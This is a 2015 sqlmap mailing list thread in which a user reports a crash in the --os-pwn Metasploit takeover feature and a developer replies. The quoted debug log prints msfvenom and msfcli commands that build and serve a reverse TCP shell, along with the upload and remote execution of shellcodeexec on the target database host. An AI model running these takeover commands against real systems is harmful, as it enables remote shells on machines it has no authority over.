Re: [sqlmap-users] SQLmap --os-pwn Meterpreter BUG
From: Miroslav S. <mir...@gm...> - 2015-07-06 10:06:43
Not able to reproduce. Can you please send the complete output of -v 3 (even the "executing local command" parts).

It seems that you are either getting the binary shellcodeexec payload (I am getting the alphanum in both msfvenom and non-msfvenom environment) or the remote path contains non-ASCII chars.

Bye

On Sun, Jul 5, 2015 at 7:41 AM, Danux <da...@gm...> wrote:

> Got another error when trying to use the metasploit reverse shell option
> either default shell or Meterpreter, below the run:
>
> which payload do you want to use?
> [1] Shell (default)
> [2] Meterpreter (beta)
> > 1
> [22:36:39] [DEBUG] executing local command:
> /usr/share/metasploit-framework/msfvenom -p linux/x86/shell/reverse_tcp
> EXITFUNC=process LPORT=3000 LHOST=192.168.184.217 -a x86 -e x86/alpha_mixed
> -f raw > "/root/.sqlmap/output/cstt/tmpmgspp" BufferRegister=EAX
> [22:36:39] [INFO] creation in progress ..... done
> [22:36:44] [DEBUG] the shellcode size is 102 bytes
> what is the back-end database management system architecture?
> [1] 32-bit (default)
> [2] 64-bit
> > 1
> [22:36:47] [INFO] uploading shellcodeexec to '/tmp/tmpsegspp'
> [22:36:47] [INFO] shellcodeexec successfully uploaded
> [22:36:47] [INFO] running Metasploit Framework command line interface
> locally, please wait..
> [22:36:47] [DEBUG] executing local command:
> /usr/share/metasploit-framework/msfcli multi/handler
> PAYLOAD=linux/x86/shell/reverse_tcp EXITFUNC=process LPORT=3000
> LHOST=192.168.184.217 E
> [*] Initializing modules...
> PAYLOAD => linux/x86/shell/reverse_tcp
> EXITFUNC => process
> LPORT => 3000
> LHOST => 192.168.184.217
> [*] Started reverse handler on 192.168.184.217:3000
> [*] Starting the payload handler...
> [22:36:51] [INFO] running Metasploit Framework shellcode remotely via
> shellcodeexec, please wait..
> [22:36:51] [WARNING] HTTP error codes detected during run:
> 404 (Not Found) - 6 times
> [22:36:51] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
> that some kind of protection is involved (e.g. WAF)
>
> [22:36:52] [CRITICAL] unhandled exception occurred in
> sqlmap/1.0-dev-96327b6. It is recommended to retry your run with the latest
> development version from official GitHub repository at '
> https://github.com/sqlmapproject/sqlmap'. If the exception persists,
> please open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any other information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get back
> to you
> sqlmap version: 1.0-dev-96327b6
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u
> *********************************************************************
> --os-pwn --msf-path /usr/share/metasploit-framework/ -v3
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap", line 102, in main
>     start()
>   File "lib/controller/controller.py", line 617, in start
>     action()
>   File "lib/controller/action.py", line 163, in action
>     conf.dbmsHandler.osPwn()
>   File "plugins/generic/takeover.py", line 261, in osPwn
>     self.pwn(goUdf)
>   File "lib/takeover/metasploit.py", line 651, in pwn
>     debugMsg += "with return code %s" %
> self._controlMsfCmd(self._msfCliProc, func)
>   File "lib/takeover/metasploit.py", line 533, in _controlMsfCmd
>     func()
>   File "lib/takeover/metasploit.py", line 434, in
> _runMsfShellcodeRemoteViaSexec
>     cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString)
> UnicodeDecodeError: 'ascii' codec can't decode byte 0x89 in position 0:
> ordinal not in range(128)
>
>
> --
> DanUx
>

--
Miroslav Stampar
http://about.me/stamparm